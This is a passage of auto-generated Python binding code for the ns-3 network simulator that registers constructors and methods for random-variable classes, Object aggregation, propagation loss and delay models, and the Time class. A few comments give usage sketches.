## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable(unsigned int k, double lambda) [constructor]
cls.add_constructor([param('unsigned int', 'k'), param('double', 'lambda')])
## random-variable.h (module 'core'): double ns3::ErlangVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::ErlangVariable::GetValue(unsigned int k, double lambda) const [member function]
cls.add_method('GetValue',
'double',
[param('unsigned int', 'k'), param('double', 'lambda')],
is_const=True)
return
def register_Ns3ExponentialVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(ns3::ExponentialVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ExponentialVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(double m, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'b')])
return
def register_Ns3GammaVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable(ns3::GammaVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::GammaVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable(double alpha, double beta) [constructor]
cls.add_constructor([param('double', 'alpha'), param('double', 'beta')])
## random-variable.h (module 'core'): double ns3::GammaVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::GammaVariable::GetValue(double alpha, double beta) const [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha'), param('double', 'beta')],
is_const=True)
return
def register_Ns3IntEmpiricalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable::IntEmpiricalVariable(ns3::IntEmpiricalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntEmpiricalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::IntEmpiricalVariable::IntEmpiricalVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3LogNormalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::LogNormalVariable::LogNormalVariable(ns3::LogNormalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::LogNormalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::LogNormalVariable::LogNormalVariable(double mu, double sigma) [constructor]
cls.add_constructor([param('double', 'mu'), param('double', 'sigma')])
return
def register_Ns3NormalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(ns3::NormalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NormalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(double m, double v) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'v')])
## random-variable.h (module 'core'): ns3::NormalVariable::NormalVariable(double m, double v, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'v'), param('double', 'b')])
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object.h (module 'core'): void ns3::Object::Start() [member function]
cls.add_method('Start',
'void',
[])
## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
cls.add_constructor([param('ns3::Object const &', 'o')],
visibility='protected')
## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
cls.add_constructor([])
## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
cls.add_method('Next',
'ns3::Ptr< ns3::Object const >',
[])
return
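# Usage sketch (illustrative, not generated): Object aggregation pairs
# AggregateObject with the iterator registered above ('obj' and 'other' stand
# for any ns3::Object subclass instances, e.g. propagation loss models):
#
#   obj.AggregateObject(other)
#   it = obj.GetAggregateIterator()
#   while it.HasNext():
#       aggregated = it.Next()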
def register_Ns3ParetoVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(ns3::ParetoVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ParetoVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m, double s) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(double m, double s, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's'), param('double', 'b')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(std::pair<double,double> params) [constructor]
cls.add_constructor([param('std::pair< double, double >', 'params')])
## random-variable.h (module 'core'): ns3::ParetoVariable::ParetoVariable(std::pair<double,double> params, double b) [constructor]
cls.add_constructor([param('std::pair< double, double >', 'params'), param('double', 'b')])
return
def register_Ns3PropagationDelayModel_methods(root_module, cls):
## propagation-delay-model.h (module 'propagation'): ns3::PropagationDelayModel::PropagationDelayModel() [constructor]
cls.add_constructor([])
## propagation-delay-model.h (module 'propagation'): ns3::PropagationDelayModel::PropagationDelayModel(ns3::PropagationDelayModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PropagationDelayModel const &', 'arg0')])
## propagation-delay-model.h (module 'propagation'): ns3::Time ns3::PropagationDelayModel::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## propagation-delay-model.h (module 'propagation'): static ns3::TypeId ns3::PropagationDelayModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3PropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::PropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::PropagationLossModel::PropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::PropagationLossModel::SetNext(ns3::Ptr<ns3::PropagationLossModel> next) [member function]
cls.add_method('SetNext',
'void',
[param('ns3::Ptr< ns3::PropagationLossModel >', 'next')])
## propagation-loss-model.h (module 'propagation'): double ns3::PropagationLossModel::CalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('CalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::PropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
return
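# Usage sketch (illustrative, not generated): loss models are chained with
# SetNext and evaluated with CalcRxPower. The mobility models 'a' and 'b'
# below are assumed to come from the separately bound ns.mobility module:
#
#   import ns.propagation
#   loss = ns.propagation.LogDistancePropagationLossModel()
#   loss.SetNext(ns.propagation.NakagamiPropagationLossModel())
#   rxDbm = loss.CalcRxPower(16.0, a, b)   # tx power in dBm -> rx power in dBm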
def register_Ns3RandomPropagationDelayModel_methods(root_module, cls):
## propagation-delay-model.h (module 'propagation'): ns3::RandomPropagationDelayModel::RandomPropagationDelayModel(ns3::RandomPropagationDelayModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::RandomPropagationDelayModel const &', 'arg0')])
## propagation-delay-model.h (module 'propagation'): ns3::RandomPropagationDelayModel::RandomPropagationDelayModel() [constructor]
cls.add_constructor([])
## propagation-delay-model.h (module 'propagation'): ns3::Time ns3::RandomPropagationDelayModel::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, is_virtual=True)
## propagation-delay-model.h (module 'propagation'): static ns3::TypeId ns3::RandomPropagationDelayModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
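# Usage sketch (illustrative, not generated): delay models follow the same
# pattern, returning an ns3::Time ('a' and 'b' again assumed to be mobility
# models from ns.mobility):
#
#   delay = ns.propagation.RandomPropagationDelayModel()
#   t = delay.GetDelay(a, b)
#   t.GetMilliSeconds()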
def register_Ns3RandomPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::RandomPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::RandomPropagationLossModel::RandomPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): double ns3::RandomPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3RangePropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::RangePropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::RangePropagationLossModel::RangePropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): double ns3::RangePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::SimpleRefCount(ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor]
cls.add_constructor([])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor]
cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function]
cls.add_method('Cleanup',
'void',
[],
is_static=True)
return
def register_Ns3ThreeLogDistancePropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::ThreeLogDistancePropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::ThreeLogDistancePropagationLossModel::ThreeLogDistancePropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): double ns3::ThreeLogDistancePropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3Time_methods(root_module, cls):
cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## nstime.h (module 'core'): ns3::Time::Time() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor]
cls.add_constructor([param('ns3::Time const &', 'o')])
## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor]
cls.add_constructor([param('std::string const &', 's')])
## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & value) [constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function]
cls.add_method('Compare',
'int',
[param('ns3::Time const &', 'o')],
is_const=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & from, ns3::Time::Unit timeUnit) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'value')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromDouble',
'ns3::Time',
[param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromInteger',
'ns3::Time',
[param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function]
cls.add_method('GetFemtoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function]
cls.add_method('GetInteger',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function]
cls.add_method('GetMicroSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function]
cls.add_method('GetMilliSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function]
cls.add_method('GetNanoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function]
cls.add_method('GetPicoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function]
cls.add_method('GetResolution',
'ns3::Time::Unit',
[],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function]
cls.add_method('GetSeconds',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function]
cls.add_method('GetTimeStep',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function]
cls.add_method('IsNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function]
cls.add_method('IsPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function]
cls.add_method('IsStrictlyNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function]
cls.add_method('IsStrictlyPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function]
cls.add_method('IsZero',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time::Unit', 'resolution')],
is_static=True)
## nstime.h (module 'core'): ns3::int64x64_t ns3::Time::To(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('To',
'ns3::int64x64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): double ns3::Time::ToDouble(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToDouble',
'double',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::ToInteger(ns3::Time::Unit timeUnit) const [member function]
cls.add_method('ToInteger',
'int64_t',
[param('ns3::Time::Unit', 'timeUnit')],
is_const=True)
return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor(ns3::TraceSourceAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor::TraceSourceAccessor() [constructor]
cls.add_constructor([])
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Connect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Connect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::ConnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('ConnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::Disconnect(ns3::ObjectBase * obj, std::string context, ns3::CallbackBase const & cb) const [member function]
cls.add_method('Disconnect',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## trace-source-accessor.h (module 'core'): bool ns3::TraceSourceAccessor::DisconnectWithoutContext(ns3::ObjectBase * obj, ns3::CallbackBase const & cb) const [member function]
cls.add_method('DisconnectWithoutContext',
'bool',
[param('ns3::ObjectBase *', 'obj', transfer_ownership=False), param('ns3::CallbackBase const &', 'cb')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3TwoRayGroundPropagationLossModel_methods(root_module, cls):
## propagation-loss-model.h (module 'propagation'): static ns3::TypeId ns3::TwoRayGroundPropagationLossModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## propagation-loss-model.h (module 'propagation'): ns3::TwoRayGroundPropagationLossModel::TwoRayGroundPropagationLossModel() [constructor]
cls.add_constructor([])
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetLambda(double frequency, double speed) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'frequency'), param('double', 'speed')])
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetLambda(double lambda) [member function]
cls.add_method('SetLambda',
'void',
[param('double', 'lambda')])
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetSystemLoss(double systemLoss) [member function]
cls.add_method('SetSystemLoss',
'void',
[param('double', 'systemLoss')])
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetMinDistance(double minDistance) [member function]
cls.add_method('SetMinDistance',
'void',
[param('double', 'minDistance')])
## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetMinDistance() const [member function]
cls.add_method('GetMinDistance',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetLambda() const [member function]
cls.add_method('GetLambda',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::GetSystemLoss() const [member function]
cls.add_method('GetSystemLoss',
'double',
[],
is_const=True)
## propagation-loss-model.h (module 'propagation'): void ns3::TwoRayGroundPropagationLossModel::SetHeightAboveZ(double heightAboveZ) [member function]
cls.add_method('SetHeightAboveZ',
'void',
[param('double', 'heightAboveZ')])
## propagation-loss-model.h (module 'propagation'): double ns3::TwoRayGroundPropagationLossModel::DoCalcRxPower(double txPowerDbm, ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b) const [member function]
cls.add_method('DoCalcRxPower',
'double',
[param('double', 'txPowerDbm'), param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b')],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3AttributeAccessor_methods(root_module, cls):
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor(ns3::AttributeAccessor const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
## attribute.h (module 'core'): ns3::AttributeAccessor::AttributeAccessor() [constructor]
cls.add_constructor([])
## attribute.h (module 'core'): bool ns3::AttributeAccessor::Get(ns3::ObjectBase const * object, ns3::AttributeValue & attribute) const [member function]
cls.add_method('Get',
'bool',
[param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
is_pure_virtual=True, is_const=True, is_virtual=True)
